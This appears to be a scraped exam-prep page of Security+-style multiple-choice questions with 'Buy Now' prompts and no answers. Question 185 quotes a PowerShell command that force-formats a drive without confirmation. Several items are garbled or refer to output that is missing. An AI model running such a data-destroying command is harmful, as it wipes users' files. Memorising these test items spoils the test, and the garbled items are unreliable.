A.

Disable Telnet and force SSH.

B.

Establish a continuous ping.

C.

Utilize an agentless monitor

D.

Enable SNMPv3 With passwords.

Buy Now
Questions 114

Which of the following is a cryptographic concept that operates on a fixed length of bits?

Options:

A.

Block cipher

B.

Hashing

C.

Key stretching

D.

Salting

Buy Now
Questions 115

Which of the following describes a maintenance metric that measures the average time required to troubleshoot and restore failed equipment?

Options:

A.

RTO

B.

MTBF

C.

MTTR

D.

RPO

Buy Now
Questions 116

A cybersecurity administrator needs to allow mobile BYOD devices to access network resources. As the devices are not enrolled to the domain and do not have policies applied to them, which of the following are best practices for authentication and infrastructure security? (Select TWO).

Options:

A.

Create a new network for the mobile devices and block the communication to the internal network and servers

B.

Use a captive portal for user authentication.

C.

Authenticate users using OAuth for more resiliency

D.

Implement SSO and allow communication to the internal network

E.

Use the existing network and allow communication to the internal network and servers.

F.

Use a new and updated RADIUS server to maintain the best solution

Buy Now
Questions 117

A company wants to modify its current backup strategy to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss. Which of the following would be the BEST backup strategy

Options:

A.

Incremental backups followed by differential backups

B.

Full backups followed by incremental backups

C.

Delta backups followed by differential backups

D.

Incremental backups followed by delta backups

E.

Full backup followed by different backups

Buy Now
Questions 118

A company installed several crosscut shredders as part of increased information security practices targeting data leakage risks. Which of the following will this practice reduce?

Options:

A.

Dumpster diving

B.

Shoulder surfing

C.

Information elicitation

D.

Credential harvesting

Buy Now
Questions 119

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

Options:

A.

Vulnerabilities with a CVSS score greater than 6.9.

B.

Critical infrastructure vulnerabilities on non-IP protocols.

C.

CVEs related to non-Microsoft systems such as printers and switches.

D.

Missing patches for third-party software on Windows workstations and servers.

Buy Now
Questions 120

Which of the following in a forensic investigation should be priorities based on the order of volatility? (Select TWO).

Options:

A.

Page files

B.

Event logs

C.

RAM

D.

Cache

E.

Stored files

F.

HDD

Buy Now
Questions 121

A security analyst is reviewing the vulnerability scan report for a web server following an incident. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

Options:

A.

Security patches were uninstalled due to user impact.

B.

An adversary altered the vulnerability scan reports

C.

A zero-day vulnerability was used to exploit the web server

D.

The scan reported a false negative for the vulnerability

Buy Now
Questions 122

Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

Options:

A.

A biometric scanner

B.

A smart card reader

C.

APKItoken

D.

A PIN pad

Buy Now
Questions 123

An employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm employee's identity before sending him the prize. Which of the following BEST describes this type of email?

Options:

A.

Spear phishing

B.

Whaling

C.

Phishing

D.

Vishing

Buy Now
Questions 124

A bad actor tries to persuade someone to provide financial information over the phone in order to gain access to funds. Which of the following types of attacks does this scenario describe?

Options:

A.

Vishing

B.

Phishing

C.

Spear phishing

D.

Whaling

Buy Now
Questions 125

The security team received a report of copyright infringement from the IP space of the corporate network. The report provided a precise time stamp for the incident as well as the name of the copyrighted files. The analyst has been tasked with determining the infringing source machine and instructed to implement measures to prevent such incidents from occurring again. Which of the following is MOST capable of accomplishing both tasks?

Options:

A.

HIDS

B.

Allow list

C.

TPM

D.

NGFW

Buy Now
Questions 126

A security incident has been resolved Which of the following BEST describes the importance of the final phase of the incident response plan?

Options:

A.

It examines and documents how well the team responded discovers what caused the incident, and determines how the incident can be avoided in the future

B.

It returns the affected systems back into production once systems have been fully patched, data restored and vulnerabilities addressed

C.

It identifies the incident and the scope of the breach how it affects the production environment, and the ingress point

D.

It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach

Buy Now
Questions 127

A client sent several inquiries to a project manager about the delinquent delivery status of some critical reports. The project manager claimed the reports were previously sent via email, but then quickly generated and backdated the reports before submitting them as plain text within the body of a new email message thread. Which of the following actions MOST likely supports an investigation for fraudulent submission?

Options:

A.

Establish chain of custody.

B.

Inspect the file metadata.

C.

Reference the data retention policy.

D.

Review the email event logs

Buy Now
Questions 128

A security analyst needs an overview of vulnerabilities for a host on the network. Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable services are running?

Options:

A.

Non-credentialed

B.

Web application

C.

Privileged

D.

Internal

Buy Now
Questions 129

Developers are writing code and merging it into shared repositories several times a day, where it is tested automatically. Which of the following concepts does this BEST represent?

Options:

A.

Functional testing

B.

Stored procedures

C.

Elasticity

D.

Continuous integration

Buy Now
Questions 130

Which of the following environments can be stood up in a short period of time, utilizes either dummy data or actual data, and is used to demonstrate and model system capabilities and functionality for a fixed, agreed-upon

duration of time?

Options:

A.

PoC

B.

Production

C.

Test

D.

Development

Buy Now
Questions 131

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

Options:

A.

Continuous monitoring

B.

Continuous deployment

C.

Continuous Validation

D.

Continuous integration

Buy Now
Questions 132

A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the issue. The security administrator is concerned tf servers in the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Select TWO).

Options:

A.

135

B.

139

C.

143

D.

161

E.

443

F.

445

Buy Now
Questions 133

A company Is planning to install a guest wireless network so visitors will be able to access the Internet. The stakeholders want the network to be easy to connect to so time is not wasted during meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms where visitors will attend meetings. Which of the following would BEST protect the company's Internal wireless network against visitors accessing company resources?

Options:

A.

Configure the guest wireless network to be on a separate VLAN from the company's internal wireless network

B.

Change the password for the guest wireless network every month.

C.

Decrease the power levels of the access points for the guest wireless network.

D.

Enable WPA2 using 802.1X for logging on to the guest wireless network.

Buy Now
Questions 134

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

Options:

A.

White team

B.

Purple team

C.

Green team

D.

Blue team

E.

Red team

Buy Now
Questions 135

A security engineer is reviewing the logs from a SAML application that is configured to use MFA, during this review the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPB, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but have been Which of the following statements BEST explains the issue?

Options:

A.

OpenID is mandatory to make the MFA requirements work

B.

An incorrect browser has been detected by the SAML application

C.

The access device has a trusted certificate installed that is overwriting the session token

D.

The user’s IP address is changing between logins, bur the application is not invalidating the token

Buy Now
Questions 136

A security engineer needs to create a network segment that can be used for servers thal require connections from untrusted networks. Which of the following should the engineer implement?

Options:

A.

An air gap

B.

A hot site

C.

A VUAN

D.

A screened subnet

Buy Now
Questions 137

If a current private key is compromised, which of the following would ensure it cannot be used to decrypt ail historical data?

Options:

A.

Perfect forward secrecy

B.

Elliptic-curve cryptography

C.

Key stretching

D.

Homomorphic encryption

Buy Now
Questions 138

A Chief Information Security Officer (CISO) is evaluating (he dangers involved in deploying a new ERP system tor the company. The CISO categorizes the system, selects the controls mat apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system Which of the following is the CISO using to evaluate Hie environment for this new ERP system?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

CIS Critical Security Controls

C.

NIST Risk Management Framevtoik

D.

ISO 27002

Buy Now
Questions 139

Which of the following authentication methods is considered to be the LEAST secure?

Options:

A.

TOTP

B.

SMS

C.

HOTP

D.

Token key

Buy Now
Questions 140

An enterprise has hired an outside security firm to facilitate penetration testing on its network and applications. The firm has agreed to pay for each vulnerability that ts discovered. Which of the following BEST represents the type of testing that is being used?

Options:

A.

White-box

B.

Red-leam

C.

Bug bounty

D.

Gray-box

E.

Black-box

Buy Now
Questions 141

A network analyst is setting up a wireless access point for a home office in a remote, rural location. The requirement is that users need to connect to the access point securely but do not want to have to remember passwords Which of the following should the network analyst enable to meet the requirement?

Options:

A.

MAC address filtering

B.

802.1X

C.

Captive portal

D.

WPS

Buy Now
Questions 142

Which of the following environments would MOST likely be used to assess the execution of component parts of a system at both the hardware and software levels and to measure performance characteristics?

Options:

A.

Test

B.

Staging

C.

Development

D.

Production

Buy Now
Questions 143

A company acquired several other small companies The company thai acquired the others is transitioning network services to the cloud The company wants to make sure that performance and security remain intact Which of the following BEST meets both requirements?

Options:

A.

High availability

B.

Application security

C.

Segmentation

D.

Integration and auditing

Buy Now
Questions 144

An employee's company account was used in a data breach Interviews with the employee revealed:

• The employee was able to avoid changing passwords by using a previous password again.

• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccuring? (Select TWO)

Options:

A.

Geographic dispersal

B.

Password complexity

C.

Password history

D.

Geotagging

E.

Password lockout

F.

Geofencing

Buy Now
Questions 145

A security analyst is running a vulnerability scan to check for missing patches during a suspected security rodent During which of the following phases of the response process is this activity MOST likely occurring?

Options:

A.

Containment

B.

Identification

C.

Recovery

D.

Preparation

Buy Now
Questions 146

A security analyst has been tasked with creating a new WiFi network for the company. The requirements received by the analyst are as follows:

•Must be able to differentiate between users connected to WiFi

•The encryption keys need to change routinely without interrupting the users or forcing reauthentication

•Must be able to integrate with RADIUS

•Must not have any open SSIDs

Which of the following options BEST accommodates these requirements?

Options:

A.

WPA2-Enterprise

B.

WPA3-PSK

C.

802.11n

D.

WPS

Buy Now
Questions 147

A store receives reports that shoppers’ credit card information is being stolen. Upon further analysis, those same shoppers also withdrew money from an ATM in that store.

The attackers are using the targeted shoppers’ credit card information to make online purchases. Which of the following attacks is the MOST probable cause?

Options:

A.

Identity theft

B.

RFID cloning

C.

Shoulder surfing

D.

Card skimming

Buy Now
Questions 148

An organization is moving away from the use of client-side and server-side certificates for EAR The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

Options:

A.

PEAP

B.

EAP-FAST

C.

EAP-TLS

D.

EAP-TTLS

Buy Now
Questions 149

Per company security policy, IT staff members are required to have separate credentials to perform administrative functions using just-in-time permissions. Which of the following solutions is the company Implementing?

Options:

A.

Privileged access management

B.

SSO

C.

RADIUS

D.

Attribute-based access control

Buy Now
Questions 150

An information security manager for an organization is completing a PCI DSS self-assessment for the first time. which of the is following MOST likely reason for this type of assessment?

Options:

A.

An international expansion project is currently underway.

B.

Outside consultants utilize this tool to measure security maturity.

C.

The organization is expecting to process credit card information.

D.

A government regulator has requested this audit to be completed

Buy Now
Questions 151

An organization would like to remediate the risk associated with its cloud service provider not meeting its advertised 99.999% availability metrics. Which of the following should the organization consult for the exact requirements for the cloud provider?

Options:

A.

SLA

B.

BPA

C.

NDA

D.

MOU

Buy Now
Questions 152

A developer is building a new portal to deliver single-pane-of-glass management capabilities to customers with multiple firewalls. To Improve the user experience, the developer wants to implement an authentication and authorization standard that uses security tokens that contain assertions to pass user Information between nodes. Which of the following roles should the developer configure to meet these requirements? (Select TWO).

Options:

A.

Identity processor

B.

Service requestor

C.

Identity provider

D.

Service provider

E.

Tokenized resource

F.

Notarized referral

Buy Now
Questions 153

A company is implementing a new SIEM to log and send alerts whenever malicious activity is blocked by its antivirus and web content filters. Which of the following is the primary use case for this scenario?

Options:

A.

Implementation of preventive controls

B.

Implementation of detective controls

C.

Implementation of deterrent controls

D.

Implementation of corrective controls

Buy Now
Questions 154

A security analyst has received several reports of an issue on an internal web application. Users state they are having to provide their credentials twice to log in. The analyst checks with the application team and notes this is not an expected behavior. After looking at several logs, the analyst decides to run some commands on the gateway and obtains the following output:

Which of the following BEST describes the attack the company is experiencing?

Options:

A.

MAC flooding

B.

URL redirection

C.

ARP poisoning

D.

DNS hijacking

Buy Now
Questions 155

A company has discovered unauthorized devices are using its WiFi network, and it wants to harden the access point to improve security. Which f the following configuration should an analysis enable

To improve security? (Select TWO.)

Options:

A.

RADIUS

B.

PEAP

C.

WPS

D.

WEP-EKIP

E.

SSL

F.

WPA2-PSK

Buy Now
Questions 156

A security engineer is installing a WAF to protect the company's website from malicious web requests over SSL. Which of the following is needed to meet the objective?

Options:

A.

A reverse proxy

B.

A decryption certificate

C.

A spill-tunnel VPN

D.

Load-balanced servers

Buy Now
Questions 157

A company has installed badge readers for building access but is finding unau-thorized individuals roaming the hallways Of the following is the most likely cause?

Options:

A.

Shoulder surfing

B.

Phishing

C.

Tailgating

D.

Identity fraud

Buy Now
Questions 158

An annual information security has revealed that several OS-level configurations are not in compliance due to Outdated hardening standards the company is using Which Of the following would be best to use to update and reconfigure the OS.level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Buy Now
Questions 159

A company needs to centralize its logs to create a baseline and have visibility on its security events Which of the following technologies will accomplish this objective?

Options:

A.

Security information and event management

B.

A web application firewall

C.

A vulnerability scanner

D.

A next-generation firewall

Buy Now
Questions 160

A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?

Options:

A.

DDoS

B.

Privilege escalation

C.

DNS poisoning

D.

Buffer overflow

Buy Now
Questions 161

A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to best meet the requirement?

Options:

A.

Fog computing and KVMs

B.

VDI and thin clients

C.

Private cloud and DLP

D.

Full drive encryption and thick clients

Buy Now
Questions 162

A local server recently crashed, and the team is attempting to restore the server from a backup. During the restore process, the team notices the file size of each daily backup is large and will run out of space at the current rate.

The current solution appears to do a full backup every night. Which of the following would use the least amount of storage space for backups?

Options:

A.

A weekly, incremental backup with daily differential backups

B.

A weekly, full backup with daily snapshot backups

C.

A weekly, full backup with daily differential backups

D.

A weekly, full backup with daily incremental backups

Buy Now
Questions 163

Which Of the following is the best method for ensuring non-repudiation?

Options:

A.

SSO

B.

Digital certificate

C.

Token

D.

SSH key

Buy Now
Questions 164

A security analyst needs to implement security features across smartphones. laptops, and tablets. Which of the following would be the most effective across heterogeneous platforms?

Options:

A.

Enforcing encryption

B.

Deploying GPOs

C.

Removing administrative permissions

D.

Applying MDM software

Buy Now
Questions 165

A network penetration tester has successfully gained access to a target machine. Which of the following should the penetration tester do next?

Options:

A.

Clear the log files of all evidence

B.

Move laterally to another machine.

C.

Establish persistence for future use.

D.

Exploit a zero-day vulnerability.

Buy Now
Questions 166

A company is adopting a BYOD policy and is looking for a comprehensive solution to protect company information on user devices. Which of the following solutions would best support the policy?

Options:

A.

Mobile device management

B.

Full device encryption

C.

Remote wipe

D.

Biometrics

Buy Now
Questions 167

To reduce and limit software and infrastructure costs the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have secunty controls to protect sensitive data Which of the following cloud services would best accommodate the request?

Options:

A.

laaS

B.

PaaS

C.

DaaS

D.

SaaS

Buy Now
Questions 168

Which Of the following best ensures minimal downtime for organizations vÄh crit-ical computing equipment located in earthquake-prone areas?

Options:

A.

Generators and UPS

B.

Off-site replication

C.

Additional warm site

D.

Local

Buy Now
Questions 169

A user received an SMS on a mobile phone that asked for bank details. Which of the following social engineering techniques was used in this case?

Options:

A.

SPIM

B.

Vishing

C.

Spear phishing

D.

Smishing

Buy Now
Questions 170

After multiple on-premises security solutions were migrated to the cloud, the incident response time increased The analysts are spending a long time trying to trace information on different cloud consoles and correlating data in different formats. Which of the following can be used to optimize the incident response time?

Options:

A.

CASB

B.

VPC

C.

SWG

D.

CMS

Buy Now
Questions 171

A network engineer is troubleshooting wireless network connectivity issues that were reported by users The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building There have also been reports of users being required to enter their credentials on web pages in order to gain access to them Which of the following is the most likely cause of this issue?

Options:

A.

An external access point is engaging in an evil-Twin attack

B.

The signal on the WAP needs to be increased in that section of the building

C.

The certificates have expired on the devices and need to be reinstalled

D.

The users in that section of the building are on a VLAN that is being blocked by the firewall

Buy Now
Questions 172

A technician is setting up a new firewall on a network segment to allow web traffic to the internet while hardening the network. After the firewall is configured, users receive errors stating the website could not be located. Which of the following would best correct the issue?

Options:

A.

Setting an explicit deny to all traffic using port 80 instead of 443

B.

Moving the implicit deny from the bottom of the rule set to the top

C.

Configuring the first line in the rule set to allow all traffic

D.

Ensuring that port 53 has been explicitly allowed in the rule set

Buy Now
Questions 173

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer's Pll?

Options:

A.

SCAP

B.

NetFlow

C.

Antivirus

D.

DLP

Buy Now
Questions 174

A customer called a company's security team to report that all invoices the customer has received over the last five days from the company appear to have fraudulent banking details. An investigation into the matter reveals the following

• The manager of the accounts payable department is using the same password across multiple external websites and the corporate account

• One of the websites the manager used recently experienced a data breach.

• The manager's corporate email account was successfully accessed in the last five days by an IP address located in a foreign country.

Which of the following attacks has most likely been used to compromise the manager's corporate account?

Options:

A.

Remote access Trojan

B.

Brute-force

C.

Dictionary

D.

Credential stuffing

E.

Password spraying

Buy Now
Questions 175

A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the following entries:

Which of the following password attacks is taking place?

Options:

A.

Dictionary

B.

Brute-force

C.

Rainbow table

D.

Spraying

Buy Now
Questions 176

An audit report indicates multiple suspicious attempts to access company resources were made. These attempts were not detected by the company. Which of the following would be the best solution to implement on the company's network?

Options:

A.

Intrusion prevention system

B.

Proxy server

C.

Jump server

D.

Security zones

Buy Now
Questions 177

A security engineer is setting up passwordless authentication for the first time.

INSTRUCTIONS

Use the minimum set of commands to set this up and verify that it works. Commands cannot be reused.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 178

A security analyst is hardening a network infrastructure The analyst is given the following requirements

• Preserve the use of public IP addresses assigned to equipment on the core router

• Enable "in transport" encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Select two).

Options:

A.

Configure VLANs on the core router

B.

Configure NAT on the core router.

C.

Configure BGP on the core router

D.

Enable AES encryption on the web server

E.

Enable 3DES encryption on the web server

F.

Enable TLSv2 encryption on the web server

Buy Now
Questions 179

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

Options:

A.

Persistence

B.

Port scanning

C.

Privilege escalation

D.

Pharming

Buy Now
Questions 180

A user enters a password to log in to a workstation and is then prompted to enter an authentication code Which of the following MFA factors or attributes are being utilized in the authentication process? {Select two).

Options:

A.

Something you know

B.

Something you have

C.

Somewhere you are

D.

Someone you know

E.

Something you are

F.

Something you can do

Buy Now
Questions 181

Security analysts notice a server login from a user who has been on vacation for two weeks, The an-alysts confirm that the user did not log in to the system while on vacation After reviewing packet capture the analysts notice the following:

Which of the following occurred?

Options:

A.

A buffer overflow was exploited to gain unauthorized access.

B.

The user's account was con-promised, and an attacker changed the login credentials.

C.

An attacker used a pass-the-hash attack to gain access.

D.

An insider threat with username logged in to the account.

Buy Now
Questions 182

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the most acceptable?

Options:

A.

SED

B.

HSM

C.

DLP

D.

TPM

Buy Now
Questions 183

A company wants to build a new website to sell products online. The website wd I host a storefront application that allow visitors to add products to a shopping cart and pay for products using a credit card. which Of the following protocols •would be most secure to implement?

Options:

A.

SSL

B.

SFTP

C.

SNMP

D.

TLS

Buy Now
Questions 184

Which of the following best reduces the security risks introduced when running systems that have expired vendor support and lack an immediate replacement?

Options:

A.

Implement proper network access restrictions.

B.

Initiate a bug bounty program.

C.

Classify the system as shadow IT.

D.

Increase the frequency of vulnerability scans.

Buy Now
Questions 185

A user downloaded an extension for a browser, and the user's device later became infected. The analyst who Is Investigating the Incident saw various logs where the attacker was hiding activity by deleting data. The following was observed running:

New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -Driveletter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false

Which of the following is the malware using to execute the attack?

Options:

A.

PowerShell

B.

Python

C.

Bash

D.

Macros

Buy Now
Questions 186

Which Of the following will provide the best physical security countermeasures to Stop intruders? (Select two).

Options:

A.

Alarm

B.

Signage

C.

Lighting

D.

Access control vestibules

E.

Fencing

F.

Sensors

Buy Now
Questions 187

Which Of the following is a primary security concern for a setting up a BYOD program?

Options:

A.

End of life

B.

Buffer overflow

C.

VM escape

D.

Jailbreaking

Buy Now
Questions 188

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would best support the new office?

Options:

A.

Always-on

B.

Remote access

C.

Site-to-site

D.

Full tunnel

Buy Now
Questions 189

During the onboarding process, an employee needs to create a password for an intranet account. The password must include ten characters, numbers, and letters, and two special characters. Once the password is created, the ‘company will grant the employee access to other company-owned websites based on the intranet profile. Which of the following access management concepts is the company most likely using to safeguard intranet accounts and grant access to multiple sites based on a user's intranet account? (Select two).

Options:

A.

Federation

B.

Identity proofing

C.

Password complexity

D.

Default password changes

E.

Password manager

F.

Open authentication

Buy Now
Questions 190

An audit identified Pll being utilized in the development environment of a crit-ical application. The Chief Privacy Officer (CPO) is adamant that this data must be removed: however, the developers are concerned that without real data they cannot perform functionality tests and search for specific data. Which of the following should a security professional implement to best satisfy both the CPOs and the development team's requirements?

Options:

A.

Data purge

B.

Data encryption

C.

Data masking

D.

Data tokenization

Buy Now
Questions 191

Which of the following terms should be included in a contract to help a company monitor the ongo-ing security maturity Of a new vendor?

Options:

A.

A right-to-audit clause allowing for annual security audits

B.

Requirements for event logs to kept for a minimum of 30 days

C.

Integration of threat intelligence in the companys AV

D.

A data-breach clause requiring disclosure of significant data loss

Buy Now
Questions 192

A security analyst discovers that one of the web APIs is being abused by an unknown third party. Logs indicate that the third party is attempting to manipulate the parameters being passed to the API endpoint. Which of the following solutions would best help to protect against the attack?

Options:

A.

DLP

B.

SIEM

C.

NIDS

D.

WAF

Buy Now
Questions 193

A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.

INSTRUCTIONS

Please click on the below items on the network diagram and configure them accordingly:

  • WAP
  • DHCP Server
  • AAA Server
  • Wireless Controller
  • LDAP Server

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 194

An annual information security assessment has revealed that several OS-level configurations are not in compliance due to outdated hardening standards the company is using. Which of the following would be best to use to update and reconfigure the OS-level security configurations?

Options:

A.

CIS benchmarks

B.

GDPR guidance

C.

Regional regulations

D.

ISO 27001 standards

Buy Now
Questions 195

Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS

Not all attacks and remediation actions will be used.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 196

An attack has occurred against a company.

INSTRUCTIONS

You have been tasked to do the following:

Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and reviewing the output. (Answer Area 1).

Identify which compensating controls should be implemented on the assets, in order to reduce the effectiveness of future attacks by dragging them to the correct server.

(Answer area 2) All objects will be used, but not all placeholders may be filled. Objects may only be used once.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Select and Place:

Options:

Buy Now
Questions 197

A financial institution would like to store its customer data in the cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution Is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would best meet the requirement?

Options:

A.

Asymmetric

B.

Symmetric

C.

Homomorphic

D.

Ephemeral

Buy Now
Questions 198

An organization routes all of its traffic through a VPN Most users are remote and connect into a corporate data center that houses confidential information There is a firewall at the internet border, followed by a DLP appliance, the VPN server and the data center itself Which of the following is the weakest design element?

Options:

A.

The DLP appliance should be integrated into a NGFW.

B.

Split-tunnel connections can negatively impact the DLP appliance's performance.

C.

Encrypted VPN traffic will not be inspected when entering or leaving the network.

D.

Adding two hops in the VPN tunnel may slow down remote connections

Buy Now
Questions 199

Which of the following will increase cryptographic security?

Options:

A.

High data entropy

B.

Algorithms that require less computing power

C.

Longer key longevity

D.

Hashing

Buy Now
Questions 200

Which of the following has been implemented when a host-based firewall on a legacy Linux system allows connections from only specific internal IP addresses?

Options:

A.

Compensating control

B.

Network segmentation

C.

Transfer of risk

D.

SNMP traps

Buy Now
Questions 201

A security professional wants to enhance the protection of a critical environment that is Used to store and manage a company's encryption keys. The selected technology should be tamper resistant. Which of the following should the security professional implement to achieve the goal?

Options:

A.

DLP

B.

HSM

C.

CA

D.

FIM

Buy Now
Questions 202

A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage Which of the following is most likely the cause?

Options:

A.

The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage

B.

The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.

C.

The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.

D.

The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Buy Now
Questions 203

Which of the following are common VoIP-associated vulnerabilities? (Select two).

Options:

A.

SPIM

B.

Vishing

C.

VLAN hopping

D.

Phishing

E.

DHCP snooping

F.

Tailgating

Buy Now
Questions 204

Which of the following is constantly scanned by internet bots and has the highest risk of attack in the case of the default configurations?

Options:

A.

Wearable sensors

B.

Raspberry Pi

C.

Surveillance systems

D.

Real-time operating systems

Buy Now
Questions 205

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly Which of the following technologies should the IT manager use when implementing MFA?

Options:

A.

One-time passwords

B.

Email tokens

C.

Push notifications

D.

Hardware authentication

Buy Now
Questions 206

A security analyst discovers that a company's username and password database were posted on an internet forum. The usernames and passwords are stored in plaintext. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

Options:

A.

Create DLP controls that prevent documents from leaving the network.

B.

Implement salting and hashing.

C.

Configure the web content filter to block access to the forum.

D.

Increase password complexity requirements.

Buy Now
Questions 207

A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

Options:

A.

POP

B.

IPSec

C.

IMAP

D.

PGP

Buy Now
Questions 208

A Security engineer needs to implement an MDM solution that complies with the corporate mobile device policy. The policy states that in order for mobile users to access corporate resources on their

devices, the following requirements must be met:

  • Mobile device OSs must be patched up to the latest release.
  • A screen lock must be enabled (passcode or biometric).
  • Corporate data must be removed if the device is reported lost or stolen.

Which of the following controls should the security engineer configure? (Select two).

Options:

A.

Disable firmware over-the-air

B.

Storage segmentation

C.

Posture checking

D.

Remote wipe

E.

Full device encryption

F.

Geofencing

Buy Now
Questions 209

Which of the following would satisfy three-factor authentication requirements?

Options:

A.

Password, PIN, and physical token

B.

PIN, fingerprint scan, and ins scan

C.

Password, fingerprint scan, and physical token

D.

PIN, physical token, and ID card

Buy Now
Questions 210

A network architect wants a server to have the ability to retain network availability even if one of the network switches it is connected to goes down. Which of the following should the architect implement on the server to achieve this goal?

Options:

A.

RAID

B.

UPS

C.

NIC teaming

D.

Load balancing

Buy Now
Questions 211

A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The Infrastructure needs to handle the unpredictable loads on the company's web application. Which of the following

cloud concepts would BEST these requirements?

Options:

A.

SaaS

B.

VDI

C.

Containers

D.

Microservices

Buy Now
Questions 212

Which of the following security design features can an development team to analyze the deletion eoting Of data sets the copy?

Options:

A.

Stored procedures

B.

Code reuse

C.

Version control

D.

Continunus

Buy Now
Questions 213

During a security incident the security operations team identified sustained network traffic from a malicious IP address: 10.1.4.9 A security analyst is creating an inbound firewall rule to block the IP address from accessing the organization's network. Which of the following fulfills this request?

Options:

A.

access-list inbound deny ip source 0.0.0.0/0 destination 10.1.4.9/32

B.

access-list inbound deny ip source 10.1.4.9/32 destination 0.0.0.0/0

C.

access-list inbound permit ip source 10.1.4.9/32 destination 0.0.0.0/0

D.

access-list inbound permit ip source 0.0.0.0/0 destination 10.1.4.9/32

Buy Now
Questions 214

Which of Ihe following control types is patch management classified under?

Options:

A.

Deterrent

B.

Physical

C.

Corrective

D.

Detective

Buy Now
Questions 215

Which of the following is most likely to contain ranked and ordered information on the likelihood and potential impact of catastrophic events that may affect business processes and systems, while also highlighting the residual risks that need to be managed after mitigating controls have been implemented?

Options:

A.

An RTO report

B.

A risk register

C.

A business impact analysis

D.

An asset value register

E.

A disaster recovery plan

Buy Now
Questions 216

A manager for the development team is concerned about reports showing a common set of vulnerabilities. The set of vulnerabilities is present on almost all of the applications developed by the team. Which of the following approaches would be most effective for the manager to use to

address this issue?

Options:

A.

Tune the accuracy of fuzz testing.

B.

Invest in secure coding training and application security guidelines.

C.

Increase the frequency of dynamic code scans 1o detect issues faster.

D.

Implement code signing to make code immutable.

Buy Now
Questions 217

A security engineer is concerned the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer wants a tool that can monitor for changes to key files and network traffic for the device. Which of the following tools should the engineer select?

Options:

A.

HIDS

B.

AV

C.

NGF-W

D.

DLP

Buy Now
Questions 218

A large retail store's network was breached recently. and this news was made public. The Store did not lose any intellectual property, and no customer information was stolen. Although no fines were incurred as a result, the Store lost revenue after the breach. Which of the following is the

most likely reason for this issue?

Options:

A.

Employee training

B.

Leadership changes

C.

Reputation

D.

Identity theft

Buy Now
Questions 219

A security analyst is reviewing packet capture data from a compromised host On the In the packet capture. analyst locates packets that contain large of text, Which Of following is most likely installed on compromised host?

Options:

A.

Keylogger

B.

Spyware

C.

Torjan

D.

Ransomware

Buy Now
Questions 220

